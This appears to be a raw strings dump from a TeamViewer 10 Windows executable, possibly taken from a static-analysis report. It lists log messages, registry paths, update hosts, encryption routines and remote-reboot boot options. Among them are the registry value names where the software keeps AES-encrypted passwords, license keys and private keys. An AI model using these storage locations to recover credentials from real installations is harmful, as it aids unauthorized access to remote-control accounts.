CHttpRedirectionProtocol::GetPostRequestData: pIBindInfo is NULL
CHttpRedirectionProtocol::GetPostRequestData: GetBindInfo failed with 0xx
CHttpRedirectionProtocol: GetExtension failed with error 0xx
CHttpRedirectionProtocol: GetQuery failed with error 0xx
CHttpRedirectionProtocol: dispatcher returned no request handler for '%1%'
CHttpRedirectionProtocol: GetPath failed with error 0xx
CHttpRedirectionProtocol: HttpNegotiate could not be queried from protocol sink
HTTP/1.1 %1% %2%
CHttpRedirectionProtocol::GetMimeTypeOfBindInfo: pIBindInfo->GetBindString failed with 0xx
CHttpRedirectionProtocol: ReadImpl called unexpectedly
CHttpRedirectionProtocol::GetDataOfStorageMedium: Unhandled type %1% in dataMedium.tymed
CHttpRedirectionProtocol::GetMimeTypeOfBindInfo: pszMIMEType == NULL
CHttpRedirectionProtocol::GetDataOfStorageMedium: pStream->Read with 0xx
CHttpRedirectionProtocol::GetDataOfStorageMedium: dataMedium.pstm is NULL
CHttpRedirectionProtocol::GetDataOfStorageMedium: dataSize == 0, returning no post data
CHttpRedirectionProtocol::GetDataOfStorageMedium: ::GlobalLock(bindinfo.stgmedData.hGlobal) returned NULL
CJavaScriptCallerImpl::Invoke: Invoke returned unsupported Variant result type %1%
CJavaScriptCallerImpl::ResolveToDispatch: Invoke failed with (error 0xx)
CJavaScriptCallerImpl::ResolveToDispatch: GetIDOfName failed with error 0xx, functionName %s, propertyName %s
Unsupported Variant result type
Software\Microsoft\Windows\CurrentVersion\Policies\System
ServerGUI.ProcessApplSelHandleList
ClientSettings::ModifySetFun_MsgBoxDefaultTimeout
CServerThreadInfo::Received_TVCommand TVCmdCombinedCommands, exception when reading vector:
ServerThreadInfo.Received_RemoteUpdate: CQS with predefined password and service
ActivateAutoUpdateRootCertXP(): %1%.
TVUpdate.CanUpdate: CQS with predefined password
TeamViewer.exe
http[s]?://([a-zA-Z0-9.-] \.teamviewer\.com)(/[a-zA-Z0-9._/-] /)?
TVUpdate::Init() Version-URL: %1%%2% Update-URL: %3%%4%
download.teamviewer.com
update.exe
TVUpdate::StartVersionFileDownload(): Operation aborted!
- ShellExecute:
uninstall.exe
CDownloadHelper.ExecuteFile(): no file set to install
CDownloadHelper::ExecuteFile(): filename: %1% params: %2%
%s failed with error %lu: %s
CDownloadHelper - Error execute
download/index.aspx
CHttpRedirectionProtocol::Register failed with 0xx
Main: To load an ini-file, please open TeamViewer.ini and set NoSave to 1.
PredefinedSessionPassword (reset) ForceId(%1%) CurrentId(%2%) ConsoleId(%3%)
CMain::InitPasswords: using predefined session password
TeamViewer10_Exit.hta
TXT-Files (*.txt)
*.txt
All Files (*.*)
CMainWindow::ShouldShowDynamicPassword(): dynPw=%1% allowIncoming=%2% id=%3% ka=%4% lanAllowed=%5% lanOnly=%6% networkState=%7% showDynPwd=%8%
MainWindow.OnDestroy: WTSUnRegisterSessionNotification failed with error %1%
CMainWindow::SetVisibleDependingOnWindowState(): P_FORCE_WINSTATE_ONCE = WinState_Tray
CMainWindow::SetVisibleDependingOnWindowState(): P_FORCE_WINSTATE_ONCE = WinState_Maximized
CMainWindow::SetVisibleDependingOnWindowState(): P_FORCE_WINSTATE_ONCE = WinState_Minimized
InterProcessGUI::UpdateFirewallMsg: Cannot parse status type.
MsgBoxDontShow\ML
MessageLayer.ShowMessageFromID: invalid message ID %1%
URL is not valid. no browser window opened.
hXXp://
SCB: Remote Site %1% is using unsupported Codec Type %2%. Discarding packet.
licensing/commercialuse.aspx
CTVWidgetVideoWin::OnWidgetPopupCommand(): Unknown cmdID %1%
Windows Store Apps
SysShadow
\StringFileInfo\xx\FileDescription
sidebar.exe
teamviewerdebug.exe
teamviewer.exe
WindowObserverGUI::SelectAllWindows: %1%;%2%
winhttp.dll
%Y-%m-%d %H.%M.%S
SessionRecorder: Execute start recording
SessionRecorder: Start recording, waiting for keyframe
SessionRecorder: Execute stop recording, NOT in main thread
Sessionrecorder: Execute resume recording
Sessionrecorder: Execute pause recording
.tmp.tvs
%Y-%m-%d %H.%M
CSessionRecorder::FinalizeAndCloseTempFile: Adding final command to buffer, %1% keyframes generated.
*.tvs
Client.ActivateByLicense
CRemoteInfoDialog.Show.Stream
ShortRemoteInfo.Stream.Incomplete
ShortRemoteInfo.Stream.Inconsistent
BListRoot.AddGroup: group ID already exists:
BListRoot.AddBuddy: buddy ID already exists:
BListRoot.AddBuddy: invalid group ID
BListRoot.SetItemProperty: item with ID not found:
BListRoot.RenameItem:
BListRoot.RenameItem: wrong item type
BListRoot.AddMachine: invalid buddy ID
BListRoot.GetItemForConnectionProperty: item with ID not found:
BListRoot.SetConnectionProperty: invalid parameter
BListRoot.SetItemProperty: invalid parameter
BListRoot.ChangeMachineState: machine with session ID %1% not found
BListRoot.GetGroupByBuddyID: Group not found for buddy ID
BListRoot.ChangeComputerState: invalid buddy ID %1%
BuddyClientReceive.DecryptStringFromByteArray: wrong length
CBuddyClientReceive::UpdateBuddylist: buddy password could not be decrypted
CBuddyClientReceive::UpdateBuddylist: Could not import Group key for group %1%:
BuddyClientReceive.UpdateBuddyList: length is 0
BuddyClientReceive.ProcessCommand: s_BuddyCommandReceived not connected to any slots.
BuddyClientReceive.HandleResponse.Error: unknown request type
CBuddyClientReceive::ReceivedAccountResponse: CompanyRequestPublicKey failed with error %1% ('%2%')CBuddyClientReceive::ReceivedAccountResponse: CompanyRequestMemberPublicKeys failed with error %1% ('%2%')CBuddyClientReceive::ReceivedAccountResponse: ModifyInstantSupport failed with error %1% ('%2%')BuddyClientReceive.ReceivedAccountResponse: request ID %1% not found in m_pendingchanges
BuddyClientReceive.UpdateBuddyList: ChangeMachineState failed
CBuddyClientReceive::ReceivedAddGroup: add groupKey:
CBuddyClientReceive::ReceivedAddGroupResponse: adding groupkey:
Account Login complete, inCompany = %1%, with rights %2%
CBuddyClientReceive::ReceivedLoginResponse: Continue AccountUpgrade
CBuddyClientReceive::ReceivedLoginResponse: Start AccountUpgrade
CBuddyClientReceive::ReceivedLoginResponse(): from_iso_string: %1%
BuddyClientReceive.ReceivedChangedOnlineState: ChangeMachineState failed
BuddyClientReceive.ReceivedMoveBuddy: MoveBuddy failed
BuddyClientReceive.BC_PROPERTY: not all properties could be set in SetItemProperties (%1% of %2% were set)
BuddyClientReceive.BC_PROPERTY: SetItemProperty failed
CBuddyClientSend::RequestAddGroup: create groupkey
BuddyClientReceive.ReceivedMessageToClient: unknown message type
BuddyClientReceive.ReceivedMessageToClient: deserialize QuickJoin command
CBuddyClientReceive::ReceivedCreateInstantSupportResponse: failed with error %1% ('%2%')CBuddyClientReceive::ReceivedSetGroupKey:
CBuddyClientReceive::ReceivedSetGroupKey: enc is NULL!
CBuddyClientReceive::ReceivedAccountSessionIdNotFound: Relogin because SessionID not found
CBuddyClientReceive::ReceivedAccountPublicKey: import public key:
CBuddyClientReceive::ReceivedQueryInstantSupportResponse: failed with error %1% ('%2%')BuddyClientSend.QuickSupportAccountLogin: DynGate ID is 0
TVWidgetAudioConferenceWin::OnWidgetPopupCommand(): Unknown cmdID %1%
CTVWidgetBackmonitorWin::OnWidgetPopupCommand(): Unknown cmdID %1%
CTVWidgetChatWin::OnWidgetPopupCommand(): Unknown cmdId %1%
CTVWidgetSessionListWin::OnWidgetPopupCommand(): Unknown cmdID %1%
TVWidgetViewWin.OnCreateWidgetCallback: could not create widget window! EC=%1%
ITVWidgetViewWin.OnCreateWidgetCallback: control window pointer is NULL
Partner does not support this widget. ( widgetType = %1%)
WidgetManager.CreateClientWidget: control window pointer is NULL
%sAudioCapture:
Camera: Direct Show disabled by user or quartz.dll not available. Using fallback
Camera: rgb bit depth %1% of camera driver not supported.
Camera: Camera Image Format 0x%x, %d bpp not supported
Unknown Error 0x%x
Camera: width = %i, height = %i is not supported by the camera!
Camera: found matching video format width = %i, height = %i, format = %s
Camera: no matching video format found! Supported Formats are:
Camera: size = %i, format = %s, width = %i, height = %i, bpp = %i, planes = %i, framesize = %i
Camera: name = '%S', best Matching Video Format: %s (%s), width = %i, height = %i, bpp = %i, planes = %i, framesize = %i
Camera: currently %1%dropping frames, flips %2%, dropped %3% since %4% ms
MsgPlayer
CMsgPlayer: waveOutPrepareHeader () failed
VideoCodec: Codec %1% not supported
VideoCodec: Codec %1% not supported by this client version
hVideoFrame: unsupported format %1%
VideoFrame.rgb_copy: wrong data
VideoFrame.yuv_copy_4_2_2: wrong data
VideoFrame.yuv_copy_4_2_0: wrong data
VideoFrame.jpg_2_rgb: Image Size Mitsmatch (%ix%i != %ix%i)
VideoFrame.jpg_2_yv12: Image Size Mitsmatch (%ix%i != %ix%i)
VideoFrame.jpg_2_yv12: MJPG Decoder Unimplemented Colour Subsampling H %1% V %2%
CMessageBoxImpl::CheckTextForPlaceHolders(): Unknown key word in string "%1%"
\\.\MonitorFunction
%1%,%2%,%3%,%4%,%5%
GraphicAdapterInterface: Could not set Cooperative Level on (%1%, %2%).
VideoSurface: Created %1% Surface on %2% on %3%, %4%x%5%, %6% bpp
GetDeviceDataFromMMDevice: Failed to get PKEY_Device_FriendlyName: 0x%1$x %2%
GetDeviceDataFromMMDevice: Failed to get PKEY_AudioEndpoint_GUID: 0x%1$x %2%
SecurityPasswordExported
HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer
HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer\DefaultSettings
HKEY_CURRENT_USER\SOFTWARE\TeamViewer
security.dll
secur32.dll
BCommand::GetParamString(): string not null-terminated, BCmd: %1%, Param: %2%
CRASH in BCommand::Serialize: inbuf = NULL with param.len = %1%, paramID = %2%, m_CommandType = %3%
ScopedCom: COMPOBJ.DLL and OLE2.DLL incompatible !
ScopedCom: Unknown error 0x%x of ::OleInitialize() !
IPC_Port_Service
UseTestMasterKeys
Open Website
OpenWebSite() error: %1%, url = %2%
tvhelper::BitDescramble(): sData passed to be descrambled is NULL!
GetPortFromIP()
TeamViewerPerfMon.dll
Loading TeamViewerPerfMon.dll succeeded.
Loading TeamViewerPerfMon.dll failed, err = %1%
Shell32.dll
user32.dll
advapi32.dll
CLogging::SetExeAbbreviation
%1% (%2%)
{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}10.0.47484
\\.\pipe\*
!\\.\pipe\
TerminalServer.UnregisterProcessTerminated: UnregisterWaitEx for process %1% failed with error %2%
CToken::Logon(): LogonUser() failed %d
ConnectAlreadyJoined
_Service.exe
%Y-%b-%d %H:%M:%S%F %z
%H:%M:%S
%O:%M:%S%F
%Y-%m-%d %H:%M:%S%F%Q
%Y%m%dT%H%M%S%F%q
%Y-%m-%d
%Y%m%d
CReading partners public key
Encryption.CreateSignature
Generating new RSA private/public key pair
Encryption.GeneratePrivateKeys
Encryption.SetPrivateKeys
Validation of saved private key failed!
CEncryption::DeCryptBCommand(): decrypt CMD_BUDDY_ENCRYPTED failed!
CEncryption::DeCryptBCommand(): sessionKey is NULL
Reading partners signature key
Key failed sanity check!
Invalid signature key
RSADecrypt: invalid private key
Encryption.RSADecrypt
Encryption.RSAEncrypt
Could not parse private key BLOB
Is64BitWindows: IsWow64Process failed with error
dTV_w32.exe
TV_x64.dll
TV_x64.exe
TeamViewer_StaticRes.dll
TV_w32.dll
InfFileGetCatalog: '%s' has associated catalog file: '%s'
GetHashStringFromFile: File '%s' does not exist.
Microsoft Windows Hardware Compatibility Publisher
GetSimpleDisplayCertNameFromFile: File '%s' does not exist.
GetSimpleDisplayCertNameFromFile: Found cert name: '%s'.
GetSimpleDisplayCertNameFromFile: Found cert name via catalog: '%s'.
VerifyTeamViewerCertificate(): CreateFile failed:
VerifyTeamViewerCertificate(): ImageEnumerateCertificates failed
VerifyTeamViewerCertificate(): cert_count =
VerifyTeamViewerCertificate(): ImageGetCertificateHeader failed
VerifyTeamViewerCertificate(): ImageGetCertificateData failed
CryptCATAdminCalcHashFromFileHandle: '%s' failed with '%d'.
GetHashStringFromFile: File '%s' has thumb print '%s'.
GetSimpleDisplayCertNameFromCatalog: File '%s' with assoc catalog '%s' has cert name: '%s'.
GetSimpleDisplayCertNameFromFileViaCatalog: failed to convert hash string '%s'.
GetSimpleDisplayCertNameFromFileViaCatalog: failed to acquire context with error '%d'.
GetSimpleDisplayCertNameFromFileViaCatalog: Associated catalog file via thumb print: '%s'.
GetSimpleDisplayCertNameFromFileViaCatalog: Found catalog file section: '%s'.
DriverIsTeamViewerSigned: No valid certificate found: %.
DriverIsTeamViewerSigned: valid TeamViewer certificate found.
DriverIsTeamViewerSigned: certificate was not expected: %s.
SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\Subcomponents
CheckAutoUpdateRootCertXP(): Registry value '%1%\%2%' not found.
VerifyTeamViewerCertificate(): CryptVerifyMessageSignature failed
VerifyTeamViewerCertificate(): name=
VerifyTeamViewerCertificate(): hashlen=%1% expected=%2%
VerifyTeamViewerCertificate(): Unknown certificate (Hash: %1%)
VerifyTeamViewerCertificate(): CryptHashCertificate failed
DriverIsWHQLSigned: No valid certificate found: %.
DriverIsWHQLSigned: valid Microsoft certificate found.
DriverIsWHQLSigned: certificate was not expected: %s.
/i:"%s\inf\sysoc.inf" /u:"%s" /q /r
\system32\sysocmgr.exe
SetAutoUpdateRootCertXP(): System component manager sysocmgr.exe could not be started.
SetAutoUpdateRootCertXP(): System component manager sysocmgr.exe could not be started with admin credentials.
SetAutoUpdateRootCertXP(): Activate automatic update of root certificates.
SetAutoUpdateRootCertXP(): Wrong OS. Only Windows XP/2003 allowed.
TVSysOCMgr.cfg
SetAutoUpdateRootCertXP(): Temporary configuration file %1% could not be created.
Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
BReading session key failed: not enough data
_Desktop.exe
_Logfile.log
_Logfile_OLD.log
_Logfile2.log
master.dyngate.com
master.teamviewer.com
\/:*?"<>|
%Program Files%\ITbrain\AntiMalware\setup.exe
Microsoft.VC80.CRT.manifest
tvinfo.ini
QS.ini
unicows.dll
80.dll
Connections_incoming.txt
HelperFuncs.Cleanup: file system error
SAS.exe
TV.dll
explorer.exe
GetKnownFolderPath(): Windows VISTA or higher required for this call!
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
mshta.exe
PendingFileRenameOperations
tv_x64.exe
tv.ini
tv_w32.exe
TVMonitor.inf
TVMonitor.sys
tvmonitor.cat
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
inf\TVPrint.cat
TeamViewer_PrintProcessor.dll
inf\TVPSPrint.cat
TVPrint.cat
inf\TeamViewer.gpd
TVPSPrint.cat
inf\TeamViewer.ppd
TeamViewer.gpd
TVMonitor.sy_
TVPrint.inf
inf\TVPrint.inf
TVPSPrint.inf
inf\TVPSPrint.inf
SOFTWARE\Microsoft\Windows NT\CurrentVersion
GetWindowsRegistrationName
GetWindowsRegistrationOrganization
i386\TeamViewer.gpd
TeamViewer.ppd
i386\TeamViewer.ppd
\tvinfo.ini
INSTEXE
GetWindowsUserLanguageCode()
Tcpip
ExtractFromInstExe: Unknown INSTEXE_EXTRACT_TYPE
boot.ini
CRemoteReboot::SetSafeMode() RegistryKeyWasCreated
Software\Microsoft\Windows\CurrentVersion\Setup
CRemoteReboot::SetSafeMode() read bootini 'operating systems' failed!
operating systems
/safeboot:NETWORK /Execute /NoExecute=AlwaysOff
/noexecute=optin
CRemoteReboot::DisableDeleteTemporaryFolderOnLogoff() set registry key to 0
CRemoteReboot::SetSafeMode() bcdedit.exe didn't return within %1% seconds
CRemoteReboot::SetSafeMode() bcdedit.exe returned within %1% seconds
CRemoteReboot::UndoChanges() bcdedit.exe returned within %1% seconds
CRemoteReboot::UndoChanges() bcdedit.exe didn't return within %1% seconds
/NoExecute=OptIn
/safeboot:NETWORK /Execute /NoExecute=AlwaysOff
CRemoteReboot::Reboot (Reboot-Type=%1%, PartnerID=%2%, InstantSupportSession=%3%)
CRemoteReboot::Reboot(%1%): ExitWindowsEx()/InitiateSystemShutdown() returns %2%, GetLastError()=%3%
CRemoteReboot::UndoChanges() boot.ini 'operating systems' not found!
CRemoteReboot::UndoChanges() write boot.ini failed!
CRemoteReboot::UndoChanges() boot.ini 'boot loader' not found!
CRemoteReboot::UndoChanges() DeleteKey
CRemoteReboot::UndoChanges() RegistryKeyWasCreated
UDPToRouter
useUDP
ServerPasswordAES
OptionsPasswordAES
PermanentPassword
UseUDPForLegacyClientsWithSessionReporting
CQSPasswordData
CQSPasswordId
ACFullAccessOnLoginScreen
CQJPassword
MsgBoxDontShow\DisableAeroDialog
Demo_Password
Security_WinLogin
Predefined_Session_Password_Text
Predefined_Session_Password_Data
Security\Security_Limit_Windows_Authentication_Local_Groups
Restore_Session_InstantSupport_Id
Security_PasswordStrength
LicenseKeyAES
MultiUserSupportActivated
MultiUserSupport
KeypressDelay
CommunityKeepAlivePortsEnabled
PendingReportAgentInstalled
PendingReportAgentUninstalled
Wol_Port
CurlVerboseLogging
MsgBoxDefaultTimeout
SRPPasswordMachineIdentifier
CParticipantManagerBase::CheckAndSubscribeNewStream(): Subscribe stream now streamID=%1% type=%2% required=%3% supported=%4%
CParticipantManagerBase::CheckAndSubscribeNewStream(): Stream requires unsupported features! streamID=%1% type=%2% required=%3% supported=%4%
%u.lu
FileManager.GetFileTime: GetTimeFormat failed with error %1%
FileManager.GetFileTime: GetDateFormat failed with error %1%
TV-WF-%%%%.tmp
Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
ITbrain_StaticRes.dll
TeamViewer_Resource.dll
TeamViewer_CustomResource.dll
ITbrain_Resource.dll
LoadFileFromURL: Failed to open stream onto %1%
curl debug %1%: %2%
LoadfromURL: using proxy '%1%:%2%'%3%%4%
LoadfromURL: URL %1% failed. Using Proxy: %2%, CURLcode: %3%
, password set
LoadfromURL: Proxy needs working username and/or password
TVCommandAccessControlHelper::ApplyAccessControlFromTVCommand: cmd is no TVCmdSendAccessControl
CSynchThread: duration = %1%s
MeetingAccessControl.ReadFromBCommand
CSRPPasswordHelper::GetMyIdentifier: CQS with predefined password without srp identifier
CSRPPasswordHelper::GetMyIdentifier: using fallback
CInetDownload::ThreadRun - file.open '%1%' failed.
CInetDownload::ThreadRun - WinHttpConnect error %1%
CInetDownload::ThreadRun - WinHttpOpenRequest error %1%
WinHttpReadData failed with error %1%
WinHttpQueryDataAvailable failed with error %1%
SupportedFeatures2
SupportedFeatures1
OperatingSystem
%1%.%2%.%3%.%4%
Forwarding: Port forwarding set.
Forwarding: Port forwarding failed.
CWinHTTPHelper::InitInetSession: invalid proxy type %1%
HttpQueryInfo(%1%) size failed with error %2%
HttpQueryInfoNum(%1%) failed with error %2%
HttpQueryInfo(%1%) failed with error %2%
InterProcessBase::StartTcpCommunicationInternal(): setting m_NetworkConnector to new memory connector
InterProcessBase::StartTcpCommunicationInternal(): setting m_NetworkConnector to new TCP connector
InterProcessBase::HandleRetryTimer(): Retrying TCP communication (failed to connect to service)
InterProcessBase::HandleRetryTimer(): Retrying TCP communication (timeout)
InterProcessBase::HandleRetryTimer(): Retrying TCP communication (some processes failed to respond: %1% / %2%)
SecureNetwork::HandleBCmdCallback(): Not handled, RegistrationID: %1%, CC: %2%
ControlCenterIPCImplementation::HandleGetKeyCallback: Could not parse Key from Command
CInterProcessNetwork::Start(): Port %1% is in use. Trying next port
Using IPC-Port %1%
addportmon
delportmon
CInterProcessNetwork::ProcessTVCommand(): command from session %1%, should be %2%; cmdtype=%3%
InterProcessNetwork::Received_StartLoaderProcess(): SetEvent() failed %d
CInterProcessNetwork::Received_StartLoaderProcess(): ShellExecuteEx() failed %1%
CInterProcessNetwork::Received_Session_ChangeMode(): could not get valid windows session!
RenameVPNAdapter: RegOpenKeyEx: Retry
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}RenameVPNAdapter: RegOpenKeyEx:
CInterProcessNetwork::Uninstall() - Error execute:
Imported installer settings: %1%
MachineSettings::LoadAll() couldn't open HKEY_LOCAL_MACHINE
MachineSettings::SetPrivateKeysFromSettings
MachineSettings::LoadAll() fallback to HKEY_CURRENT_USER
MachineSettings::SetInstallerTempSettings SecurityPasswordExported
MachineSettings::SetInstallerTempSettings: permanent password invalid
MachineSettings::SetInstallerTempSettings: importing permanent password
MachineSettings::SetInstallerTempSettings: additional permanent passwords invalid
MachineSettings::SetInstallerTempSettings: importing additional permanent passwords
MachineSettings::SetInstallerTempSettings P_SECURITY_MPM_PWDS_EXPORTED
Offline() Shutdown.WT
Offline() StopListening.WT
Offline() CT.Terminate
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_USERS
HKEY_PERFORMANCE_DATA
Certificate
CertificateKey
Temp\ProxyPasswordW
Temp\OptionsPasswordA
Temp\ProxyPasswordA
Temp\MultiPwdMgmtPWDsExported
UDPMaxPunches
Temp\OptionsPasswordW
Temp\SecurityPasswordExported
ForceUseHttp
MaxHttpPacketSizeWithPriorization
UDPPingVersion
GWW.KeepAliveLost
GWW.CustomRouterUnavailable
GWW.KeepaliveTimedout
GWW.KeepaliveTimedout INITIAL_KEEPALIVETIMEOUT
SecureNetworkIPCAdapter::SendSharedBCmdCallbackInternal(): BCmd: %1%, RegistrationID: %2%, DyngateID: %3%, ProcessType: %4%, SessionID: %5%, AckID: %6%
SecureNetworkIPCAdapter::SendSharedBCmdAck(): Not handled, AckID: %1%
SecureNetworkIPCAdapter::RegisterSharedBCmdCallback(): CC: %1%, RegistrationID: %2%, DyngateID: %3%, ProcessType: %4%, SessionID: %5%
SecureNetworkIPCAdapter::UnregisterSharedBCmdCallback(): RegistrationID: %1%
MainApp.Shutdown.GWS.Disconnect n=
Terminate Session TVSession %1% in WindowsSession %2% isOutgoing: %3%
MC.Connect.Failed
ATTGUIDVERSIONNOTSUPPORTED
Login
MC.Reg
TCPIN
WindowsServerUser
PORT443OUT
HTTPOUT
TCPOUT
CMasterConnector::LoginUser: Caught exception from GetOwnSessionID: %1%
Updateing Keys on Login
MC.Login.WrongKey SH=
CKAPortsEnabled
SupportedFeatures
Unknown response - Login again
HTTPIN
CMasterConnector::GetLicenseKeyUsers(): ERROR parsing MasterResponse '%1%'
parsing MasterResponse in CMasterConnector::GetLicenseKeyUsers():
MC.RR.
SA_PasswordMD5HashBase64Encoded
MC.GetUDPConnectivity response=
UDPInitPorts: parse segments[1] failed!
GetUDPConnectivity
MC.GetUDPConnectivity failed!
UDPInitPorts: parse segments[2] failed!
CMasterConnector::GetUDPConnectivity
RequestInstantSupport
RequestRoute: ROUTE_WAITFORCONNECT not supported!
MC.RIS.
SupportSessionID
SupportSessionFlags
GetPublicKey
GetPublicKey: NOKEY
SetPublicKey
SetSignatureKey
GetSignatureKey
GetSignatureKey: NOKEY
MC.SMC.RecFailed2
MC.SMC.Send.Failed
MC.SMC.Rec.Failed
MC.ConnectToMeeting(): MeetingID=%1% Flags=%2%: result=%3% %4%
WTSShadow
TerminalServer.GUIProcessStartedByService: no GUI process in session %1%
TerminalServer.GUIProcessStartedByService: GUI process in session %1% not started
winlogon.exe
CTerminalServer::StartGUIProcess() GUI start error in session %1%: no valid executable found
CTerminalServer::LoginTSResponse() SessionID not found
CTerminalServer::LoginTSResponse sessionID=%1% userID=%2%
CTerminalServer::RepeatedlyCheckForUserLogin() Invalid state %1% for session %2%
CTerminalServer::RepeatedlyCheckForUserLogin() No process found
CTerminalServer::RepeatedlyCheckForUserLogin() Don't start GUI for session %1%
CTerminalServer::RepeatedlyCheckForUserLogin() User empty for session %1%
CTerminalServer::LoginTSUser sessionID=%1% user=%2%
--startedAsAdmin --IPCport
CTerminalServer::RepeatedlyCheckForUserLogin() User not logged in
CTerminalServer::RepeatedlyCheckForUserLogin() GetUserToken
CTerminalServer::getPathToApplicationExe(): Choosing standard filename.
CTerminalServer::StartDesktop_Execute()
CTerminalServer::getPathToApplicationExe(): no valid filename found.
CTerminalServer::getPathToApplicationExe(): Choosing filename for desktop process after remote reboot.
CTerminalServer::getPathToApplicationExe(): Choosing filename from partner process.
--IPCport
CTerminalServer::StartDesktop_Execute CreateProcessAsUser
NetWatchdog: LAN is now %1%connected
NetWatchdog: Internet is now %1%connected
NetWatchdog: Port %1% proxy search failed! No working setting found.
ping3.teamviewer.com
NetWatchdog: Start Port %1% Ping now with proxy type=%2%, IP='%3%:%4%', user='%5%'
NetWatchdog: Port %1% proxy connection type=%2%, IP='%3%:%4%', user='%5%' succeeded
m_GatewaySession.ConnectToRemote.Connected.StartThread
CTVCommandHandler::SetCanMeetingCommands(): no meeting session key!
CTVCommandHandler::ReceivedCmdMeetingControl: pseudo router is NULL!
CTVCommandHandler::ReceivedCmdMeetingControl deserialize failed!
GWS.ProcessCarrierSwitchRequest: carrier thread is NULL!
GWS.ProcessCarrierSwitchFinished: carrier thread is NULL!
GWS.ProcessCarrierSwitch: state=%1%, carrier=%2%
GWS.ProcessCarrierSwitch: invalid state %1%
GWS.CallCarrierSwitchTimeout: callDeputy is NULL!
GWS.CarrierSwitchTimeout
GWS.RequestCarrierSwitch: callDeputy is NULL!
GWS.ProcessCarrierSwitchFinished: callDeputy is NULL!
GWS.SendCmdToUDPThread: UDP-Thread is NULL!
CGatewaySession::ReadOrCreateMeetingSessionKey(): FromBinaryData state=%1%
Received meeting sessionkey V%1% from %2%
CGatewaySession::GetSecureNetworkKeys_PublickeyCallback(): could not get public key
CGatewaySession::GetSecureNetworkKeys_Done could not get own private key
CGatewaySession::ReadOrCreateMeetingSessionKey(): DecryptAndCheck state=%1% (version=%2%)
CGatewaySession::ReadOrCreateMeetingSessionKey(): get signature key failed!
CGatewaySession::ReadOrCreateMeetingSessionKey(): unknown key version=%1%
Send meeting sessionkey V1 to %1%
GWS.SendCarrierSwitch: state=%1%, carrier=%2%
GWS.SendMeetingAuthenticationCommand: routerThread is NULL!
CGatewaySession::SendSignedAndCryptedSessionKeyV3(): SymmetricEncryption not set
CGatewaySession::SendSignedAndCryptedSessionKeyV3(): key error
Send meeting sessionkey V3 to %1%
CGatewaySession::SendSignedAndCryptedSessionKeyV3(): Create failed, GetState()=%1%
CGatewaySession::Received_RouterAuthentication() Password was wrong in QuickSupport. Should not happend with MeetingQuickJoin!
CGatewaySession::ReceivedCmdMeetingAuthentication deserialize failed!
Send meeting sessionkey V2 to %1%
CGatewaySession::ReceivedCmdMeetingAuthentication: %1%
CGatewaySession::ReceivedCmdMeetingAuthentication() unknown command type %1%
CSendCommandToMaster::SendBCommandToMaster(): SendCCmdToOwnKeepAlive failed
GatewayThread::Terminate: KeepaliveSession.Ended.ClientID:
CT.Term.SessionShutdownEventNotSignaled
ConnectionThread.WaitForSession: no parent gateway
CT.WaitForSession.Failed
CT.Term.TM_WaitAtGateway: Terminated
CT.Term.TM_WaitAtGateway: SendQueueThread stopped
CT.Disconnect
CT.Disconnect.TM_WaitAtGateway finished
CT.HdlExt
CT.Disconnect.WaitForLastAck
CConnectionThread::ReconnectInternal: Send CMD_RECONNECT_TO_SESSION failed
CT.Run.LoopEnd
CT.DoKeepAlive.Timeout.BeepFailed0
CT.Run.CallDeputyNULL
CT.Run.RecFailed
FinalTimeout.UDP
CT.CheckForTimeout.Timeout
CT.CheckForTimeout.KATimeout
CT.Run.RouterPing TimedOut
CT.Run
CConnectionThread::CmdConnectToWaitingthread(): no Gatewaysession
CConnectionThread::CmdConnectToWaitingthread(): no tRequestConnect
GWT.CmdRequestConnectOutgoing.NoConnectToPartner
GWT.ProcessGatewayCommand.UnknownCommand
CMD_KEEPALIVEREQUEST invalid length
received invalid command CMD_NOPARTNERCONNECT
CMD_DISCONNECT received without CMD_ENDSESSION sent
CMD_IDENTIFY invalid length: %1% Bytes
CT.TimedOut.FinalTimeout.WaitAtGateway
FinalTimeout.Other
CT.TimedOut.FinalTimeout.UDP
FinalTimeout.WaitAtGateway
CMD_REQUESTCONNECT invalid length
CT.CmdRequestConnect: SourceClientID=%1% RemoteClientID=%2%
CT.TimedOut.FinalTimeout.Other
CT.TimedOut.Timeout2
CConnectionThread::CmdPingRouter(): Router Pong Received with following Hops:
CConnectionThread::CmdPingRouter(): More than 3 Hops to Router. Cancel Connection.
CConnectionThread::CmdPingRouter(): Send failed RetCode=
CConnectionThread::CmdPingRouter(): router pong with wrong target ID
CConnectionThread::CmdPingRouter(): thread mode is
Received ping from 127.0.0.1. Closing connection
CMD_REQUESTKEEPALIVE2 invalid length
CMD_PING invalid length
127.0.0.1
CConnectionThread::CmdPingRouter(): Caught exception while retrieving
GWT.Run.CmdRequestKeepalive.KeepAliveSession.Already.exists.for.ClientID:
CConnectionThread::CmdSessionMode(): invalid length=%1%
CT.SendDataToRouter: remote thread is NULL!
CT.ProcessCommandForClient: ParentGateway is NULL!
CT.SendDataStreamToRouter: remoteThread is NULL!
CT.SendDataDirectedToRouter: routerThread is NULL!
CT.ProcessCommandForClient: (confirmedpacket>0) ParentGateway is NULL! Abbruch er Methode
UDP is deactivated
CConnectionThread::ProcessCommandForClient() invalid CmdData-type:
CT.ProcessCommandForClient: case CMD_DATA_STREAM: gateway is NULL!
CConnectionThread::CmdPingRouter(): Unknown RCommand-Type:
CConnectionThread::CmdPingRouter(): buddyCmdStruct is NULL
CConnectionthread::CmdPingRouter(): KeepAliveThread is NULL. Push Cmds in Delayed SendQueue
received invalid command CMD_TVCONNECTIONFAILED
CConnectionThread::CmdBuddy length < sizeof(tBuddyCmd)
CMD_ROUTE_CMD_TO_CLIENT routeCmdStruct
CConnectionThread::CmdRouteCmdToClient(): No KeepAlive Thread for Client:
CConnectionThread::CmdBuddy length < offset 1
CConnectionThread::CmdBuddy buddyCmdStruct->noOfHops==4:
CConnectionThread::CmdData() headerlen=
